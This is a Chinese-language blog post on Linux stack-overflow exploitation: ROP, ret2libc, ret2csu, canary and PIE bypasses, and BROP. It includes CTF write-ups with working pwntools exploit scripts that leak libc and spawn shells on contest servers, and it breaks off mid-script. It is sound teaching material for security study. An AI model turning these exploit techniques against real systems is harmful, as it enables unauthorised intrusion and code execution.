<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png?v=6.5.0">


  <link rel="mask-icon" href="/images/safari_pinned_tab.svg?v=6.5.0" color="#222">


  <link rel="manifest" href="/images/manifest.json">


  <meta name="msapplication-config" content="/images/browserconfig.xml">







<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '6.5.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="概念 栈溢出指由于程序使用了不安全的函数或逻辑错误,导致攻击者溢出栈中缓冲区破坏(篡改)其他数据. 可以看到在栈中,位于局部变量(溢出点)后面的有:部分其他局部变量,返回地址,和所有的之前的栈帧.栈溢出可以让攻击者劫持PC register(eip/rip).有时候要劫持ebp(即被保存的栈指针)来控制栈的位置从而劫持控制流或者调用函数的局部变量值(因为局部变量一般使用ebp相对偏移). 利">
<meta name="keywords" content="Linux">
<meta property="og:type" content="article">
<meta property="og:title" content="IS-pwn-Linux-栈溢出概览">
<meta property="og:url" content="https://hitworld.github.io/posts/eb1fae06/index.html">
<meta property="og:site_name" content="w4rd3n的笔记">
<meta property="og:description" content="概念 栈溢出指由于程序使用了不安全的函数或逻辑错误,导致攻击者溢出栈中缓冲区破坏(篡改)其他数据. 可以看到在栈中,位于局部变量(溢出点)后面的有:部分其他局部变量,返回地址,和所有的之前的栈帧.栈溢出可以让攻击者劫持PC register(eip/rip).有时候要劫持ebp(即被保存的栈指针)来控制栈的位置从而劫持控制流或者调用函数的局部变量值(因为局部变量一般使用ebp相对偏移). 利">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2021-07-03T07:47:31.152Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="IS-pwn-Linux-栈溢出概览">
<meta name="twitter:description" content="概念 栈溢出指由于程序使用了不安全的函数或逻辑错误,导致攻击者溢出栈中缓冲区破坏(篡改)其他数据. 可以看到在栈中,位于局部变量(溢出点)后面的有:部分其他局部变量,返回地址,和所有的之前的栈帧.栈溢出可以让攻击者劫持PC register(eip/rip).有时候要劫持ebp(即被保存的栈指针)来控制栈的位置从而劫持控制流或者调用函数的局部变量值(因为局部变量一般使用ebp相对偏移). 利">






  <link rel="canonical" href="https://hitworld.github.io/posts/eb1fae06/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>IS-pwn-Linux-栈溢出概览 | w4rd3n的笔记</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript><!-- hexo-inject:begin --><!-- hexo-inject:end -->

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">w4rd3n的笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">混吃等死</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>友链</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://hitworld.github.io/posts/eb1fae06/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="w4rd3n">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/apple-touch-icon.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="w4rd3n的笔记">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">IS-pwn-Linux-栈溢出概览
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-04-25 18:19:53" itemprop="dateCreated datePublished" datetime="2019-04-25T18:19:53+08:00">2019-04-25</time>
            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/IS/" itemprop="url" rel="index"><span itemprop="name">IS</span></a></span>

                
                
                  ，
                
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/IS/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/posts/eb1fae06/" class="leancloud_visitors" data-flag-title="IS-pwn-Linux-栈溢出概览">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">热度：</span>
               
                 <span class="leancloud-visitors-count"></span>
                 <span>℃</span>
             </span>
          

          

          
            <div class="post-symbolscount">
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">本文字数：</span>
                
                <span title="本文字数">13k</span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">12 分钟</span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="概念">概念</h2>
<p>栈溢出指由于程序使用了不安全的函数或逻辑错误,导致攻击者溢出栈中缓冲区破坏(篡改)其他数据.</p>
<p>可以看到在栈中,位于局部变量(溢出点)后面的有:部分其他局部变量,返回地址,和所有的之前的栈帧.栈溢出可以让攻击者劫持<code>PC register(eip/rip)</code>.有时候要劫持<code>ebp</code>(即被保存的栈指针)来控制栈的位置从而劫持控制流或者调用函数的局部变量值(因为局部变量一般使用<code>ebp</code>相对偏移).</p>
<h2 id="利用方法">利用方法</h2>
<p>在<code>Intel</code>体系中,内存空间中的数据被权限分为<code>code</code>(<code>rx</code>)和<code>data</code>(<code>rw</code>)(如果没有的权限的话这两者就没有本质上的区别).</p>
<p>可执行的代码有两种,进程内存空间本身的代码(包括程序代码,动态库代码,甚至错误偏移产生的代码等等)和攻击者写进去的<code>shellcode</code>(如果程序没有开启<code>DEP</code>,也就是<code>NX</code>).</p>
<p>利用前者的方法也叫做面向返回编程(<code>Return-Oriented Programming</code>,缩写:<code>ROP</code>).</p>
<p>即攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列(称为<code>gadget</code>).<code>gadget</code>通常结束于<code>ret</code>指令.对于动态库代码中的<code>gadget</code>需要先泄露<code>libc</code>基址(绕过<code>ASLR</code>).</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary [fileName] | grep <span class="string">"pop rdi"</span></span><br><span class="line">ROPgadget --binary [fileName] --string /bin/sh</span><br></pre></td></tr></table></figure>
<p>根据不同的程序保护机制,要采用不同的漏洞利用方法.(<code>ASLR</code>基本都是默认开启)</p>
<h3 id="return-2-shellcode">Return-2-Shellcode</h3>
<p>如果程序未开启<code>NX</code>,可以直接写<code>shellcode</code>到栈(或者堆,<code>bss</code>等可控区域)上,如果能泄露对应地址(通过缓冲区泄露)就可以通过偏移直接<code>ret</code>到<code>shellcode</code>上,或者寻找<code>jmp esp</code>(<code>32</code>位)这种<code>gadget</code>控制<code>PC register(eip/rip)</code>到栈上.</p>
<h3 id="return-2-libc">Return-2-libc</h3>
<p>其实就是指利用<code>libc</code>中的函数来获取<code>shell</code>,最典型的就是<code>system("/bin/sh");</code>.这个可以用来绕过<code>DEP</code>.</p>
<p>这种利用的前提是已经泄露了一个<code>libc</code>地址(如果是动态链接,静态链接直接<code>ROP</code>即可).这样就能绕过<code>ASLR</code>获得<code>system</code>的地址.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">libc = ELF(<span class="string">"libc.so"</span>)</span><br><span class="line">off_system = libc.symbols[<span class="string">'write'</span>] - libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">system_addr = write_addr - off_system</span><br></pre></td></tr></table></figure>
<p>也可以用工具获得动态库的导出函数偏移.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nm -D libc.so | grep <span class="string">"system"</span></span><br><span class="line">objdump -T libc.so | grep <span class="string">"system"</span></span><br></pre></td></tr></table></figure>
<h3 id="return-2-csu">Return-2-csu</h3>
<p><code>64bit</code>要控制<code>rdi</code>等寄存器才能控制参数.使用工具<code>ROPgadget --binary pwn</code>可以找到<code>pop rdi; ret;</code>等<code>gadget</code>.其他和<code>32bit</code>类似.</p>
<p><code>ROPgadget</code>的<code>--ropchain</code>可以自动化生成<code>ROP</code>链(一般都用不了).</p>
<p><code>/bin/sh</code>的地址也可以用<code>ROPgadget</code>找到.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ./pwn --string /bin/sh</span><br></pre></td></tr></table></figure>
<p>而实际上这就是<code>Return-2-csu</code>,因为<code>libc_init_cus</code>函数中就有控制<code>rdi</code>和<code>rsi</code>的<code>gadget</code>,还有组合起来可以控制<code>rdx</code>的<code>gadget</code>.</p>
<h3 id="绕过pie">绕过PIE</h3>
<p>泄露一个属于该可执行文件里的内容的地址从而求出基址,或者使用部分覆盖.</p>
<h3 id="绕过canary">绕过canary</h3>
<ol type="1">
<li>泄露,通过栈泄露或者格式化字符串等方式.</li>
<li>对于有<code>fork</code>的进程,子进程<code>canary</code>值是一样的,就可以逐位爆破.</li>
<li>劫持<code>__stack_chk_fail</code>,或者更深层的调用.</li>
<li><code>__stack_chk_fail</code>会将<code>argv[0]</code>输出,通过劫持这个参数泄露内容.</li>
<li>直接劫持控制流不进行<code>canary</code>检测.</li>
<li>栈溢出足够多的数据来复写<code>TLS</code>中的<code>tcbhead_t.stack_guard</code>的值,从而<code>bypass canary</code>.</li>
<li>在<code>glibc2.23</code>下<code>mmap</code>一个合适堆可以分配到<code>TLS</code>结构上方附近,再通过堆溢出即可覆盖<code>TLS</code>中的<code>tcbhead_t.stack_guard</code>的值,例如:<code>32</code>位下<code>malloc(1024*130)</code>,此时堆指针到<code>tcbhead_t.stack_guard</code>的偏移为:<code>0x216FC</code>.</li>
</ol>
<h3 id="brop">BROP</h3>
<p>基于没有二进制文件这种情况而产生的一系列技术.</p>
<p>其思路为触发漏洞后通过回显或者连接状态得出信息.常见漏洞有栈溢出和格式化字符串漏洞.</p>
<p>格式化字符串漏洞发现后即可泄露栈上数据并任意地址读写.</p>
<p>主要研究栈溢出漏洞.</p>
<p>如果存在栈溢出的函数调用后还有输出或者其他操作,可以通过递增输入长度得到返回地址的偏移.</p>
<p>知道返回地址偏移后就可以通过测试不同的<code>gadget</code>得出一些有用的<code>gadget</code>.</p>
<p>最重要的是<code>stop gadget</code>,即不会使程序<code>crash</code>且有一定特征的<code>gadget</code>.可以利用这种<code>gadget</code>去寻找需要的<code>gadget</code>.</p>
<h4 id="starctf-2019-blindpwn">starctf-2019-blindpwn</h4>
<p>题目信息.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">checksec:</span><br><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    No canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x400000)</span><br><span class="line"></span><br><span class="line">file libc:</span><br><span class="line">libc-2.23.so: ELF 64-bit LSB shared object,  </span><br><span class="line">x86-64, version 1 (GNU/Linux), dynamically  </span><br><span class="line">linked, interpreter /lib64/ld-linux-x86-64.so.2,    </span><br><span class="line">BuildID[sha1]=b5381a457906d279073822a5ceb2</span><br></pre></td></tr></table></figure>
<p>尝试发现有栈溢出漏洞,重复测试测出偏移,寻找<code>useful gadget</code>.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">offset = <span class="number">0x28</span></span><br><span class="line">padding = <span class="string">"a"</span> * offset</span><br><span class="line"></span><br><span class="line">addrs = []</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_gadget</span><span class="params">(addr)</span>:</span></span><br><span class="line">    fd = open(<span class="string">"gadget.txt"</span>, <span class="string">'a'</span>)</span><br><span class="line">    fd.write(hex(addr) + <span class="string">'\n'</span>)</span><br><span class="line">    fd.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> addr <span class="keyword">in</span> range(<span class="number">0x4008df</span>, <span class="number">0x401AA0</span>, <span class="number">0x1</span>):</span><br><span class="line">    r = remote(<span class="string">"34.92.37.22"</span>, <span class="number">10000</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"Welcome to this blind pwn!\n"</span>)</span><br><span class="line">    payload = padding + p64(addr)</span><br><span class="line">    log.info(<span class="string">"now addr is "</span> + hex(addr))</span><br><span class="line">    r.send(payload)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        msg = r.recvrepeat(<span class="number">12</span>)</span><br><span class="line">        <span class="keyword">if</span>(msg != <span class="string">""</span>):</span><br><span class="line">            log.success(<span class="string">"find addr "</span> + hex(addr))</span><br><span class="line">            <span class="keyword">print</span> msg</span><br><span class="line">            find_gadget(addr)</span><br><span class="line">            addrs.append(addr)</span><br><span class="line">        r.close()</span><br><span class="line">    <span class="keyword">except</span> EOFError <span class="keyword">as</span> e:</span><br><span class="line">        r.close()</span><br><span class="line">        log.info(<span class="string">"connection close at "</span> + hex(addr))</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> addrs</span><br></pre></td></tr></table></figure>
<p>发现有个地方是泄露加重放漏洞,写出<code>exp</code>.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">offset = <span class="number">0x28</span></span><br><span class="line">padding = <span class="string">"a"</span> * offset</span><br><span class="line">main = <span class="number">0x400570</span></span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">"34.92.37.22"</span>, <span class="number">10000</span>)</span><br><span class="line">r.recvuntil(<span class="string">"Welcome to this blind pwn!\n"</span>)</span><br><span class="line">payload = padding + p64(<span class="number">0x400515</span>) + p64(main)</span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">libc = u64(r.recvuntil(<span class="string">"Welcome to this blind pwn!\n"</span>)[<span class="number">0x48</span> : <span class="number">0x4e</span>].ljust(<span class="number">8</span>, <span class="string">'\0'</span>)) - <span class="number">0x20830</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc "</span> + hex(libc)</span><br><span class="line"></span><br><span class="line">payload = padding + p64(libc + <span class="number">0x4526a</span>) + p64(<span class="number">0</span>) * <span class="number">0x30</span></span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="stack-pivot">stack pivot</h3>
<p>需要存在类似<code>pop esp; ret;</code>等栈迁移<code>gadget</code>,作用是将栈迁移到可控区域从而使第二次<code>ROP</code>链的内容更可控.</p>
<h3 id="syscall">syscall</h3>
<p><code>alarm + 0x5</code>是<code>syscall</code>,且后续没有有影响的处理,可正常返回.</p>
<h3 id="其他">其他</h3>
<p>具体环境不同设计,重要就是找到可写区域,可读区域和可执行区域然后通过构造<code>ROP</code>链等操作获得<code>shell</code>.</p>
<h2 id="vdso-vsyscall">vdso &amp; vsyscall</h2>
<p><code>vdso</code>(<code>Virtual Dynamic Shared Object</code>,虚拟动态共享对象)是指内核和用户空间共享的代码空间,动态分配,地址随机(栈上的环境变量中存在这个地址),提供超过<code>4</code>个系统调用,由<code>glibc</code>库提供功能.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dumpmem vdso.so 0x00007ffff7ffd000 ​0x00007ffff7fff000</span><br><span class="line"><span class="comment">#vdso映射的是一整个ELF文件</span></span><br></pre></td></tr></table></figure>
<p>由于使用<code>int 0x80</code>进行系统调用效率低,<code>Intel</code>和<code>AMD</code>分别实现了<code>sysenter/sysexit</code>和<code>syscall/sysret</code>(快速系统调用指令).</p>
<p>为了兼容这两种快速系统调用指令和未实现快速系统调用指令的<code>CPU</code>,<code>Linux</code>实现了<code>vsyscall</code>,程序调用<code>vsyscall</code>,具体的选择由内核来决定.</p>
<p>而<code>vsyscall</code>的实现就在<code>vdso</code>中.<code>vsyscall</code>在每个进程中静态分配在相同的地址,只允许<code>4</code>个系统调用,<code>gettimeofday</code>,<code>time</code>和<code>getcpu</code>.由内核提供功能.</p>
<p><code>x86_64</code>从<code>AMD</code>引进了<code>syscall</code>指令,但是<code>vdso</code>,<code>vsyscall</code>的机制依旧未变.</p>
<p><code>vsyscall</code>执行时会进行检查,如果不是从函数开头执行的话就会出错,所以一般只能用于平滑跳转,类似于<code>shellcode</code>中<code>nop</code>的作用</p>
<p>.<code>vdso</code>常用于寻找系统调用指令或者搭配<code>srop</code>,<code>x86</code>环境下<code>vdso</code>只有一字节是<code>random</code>,也就是<code>1/256</code>的命中率,范围为<code>0xf7700000 ~ 0xf7800000</code>.</p>
<h2 id="jarvis-typo">Jarvis-typo</h2>
<p>一道简单的<code>arm</code>栈溢出.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">pop_r0_r4_pc = <span class="number">0x20904</span></span><br><span class="line">system = <span class="number">0x10BA8</span></span><br><span class="line">bin_sh = <span class="number">0x6c384</span></span><br><span class="line">offset = <span class="number">112</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process(["qemu-arm", "./typo"])</span></span><br><span class="line">r = remote(<span class="string">"pwn2.jarvisoj.com"</span>, <span class="string">"9888"</span>)</span><br><span class="line">r.sendafter(<span class="string">"Input ~ if you want to quit"</span>, <span class="string">"\n"</span>)</span><br><span class="line">payload = <span class="string">"a"</span> * offset + p32(pop_r0_r4_pc) + p32(bin_sh) + p32(<span class="number">0</span>) + p32(system)</span><br><span class="line">r.sendafter(<span class="string">"------Begin------"</span>, payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="de1ctf-2019-unprintable">de1ctf-2019-unprintable</h2>
<p><code>exit</code>函数会调用<code>__run_exit_handlers</code>,<code>__run_exit_handlers</code>函数又会调用<code>dl_fini</code>函数.</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;_dl_fini+<span class="number">819</span>&gt;:	<span class="keyword">call</span>   <span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">r12</span>+<span class="built_in">rdx</span>*<span class="number">8</span>]</span><br></pre></td></tr></table></figure>
<p><code>rdx</code>固定为<code>0</code>,<code>r12</code>来自下面的代码片段.</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;_dl_fini+<span class="number">777</span>&gt;:	<span class="keyword">mov</span>    <span class="built_in">r12</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rax</span>+<span class="number">0x8</span>]</span><br><span class="line"><span class="comment">;r12 = 0x600dd8</span></span><br><span class="line">&lt;_dl_fini+<span class="number">781</span>&gt;:	<span class="keyword">mov</span>    <span class="built_in">rax</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rbx</span>+<span class="number">0x120</span>]</span><br><span class="line">&lt;_dl_fini+<span class="number">788</span>&gt;:	<span class="keyword">add</span>    <span class="built_in">r12</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rbx</span>]</span><br></pre></td></tr></table></figure>
<p><code>rbx</code>的值为一个指针,该指针在<code>printf</code>执行的栈上存在,可以控制(<code>[rbx] = target_ptr - 0x600dd8</code>).</p>
<p>控制其跳到<code>0x4007A3</code>,可发现这次栈上有一个指针指向<code>printf</code>的返回地址.这样就可以循环利用<code>printf</code>写.</p>
<p>此时可以写栈上数据并利用<code>pop esp;...;ret;</code>栈迁移后就可以<code>rop</code>了.</p>
<p>由于没有泄露,需要寻找一些加法<code>gadget</code>和程序中原有的<code>libc</code>地址(由于程序开了<code>Full RELRO</code>所以这里找到了<code>stderr</code>).</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0x00000000004006e8 : adc [rbp+48h], edx</span><br><span class="line"><span class="comment">#__do_global_dtors_aux + 8</span></span><br></pre></td></tr></table></figure>
<p>再利用<code>__libc_csu_init</code>中的<code>gadget</code>就可以<code>getshell</code>.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x0000000000400819 : call qword ptr [r12+rbx*8]</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">adc = 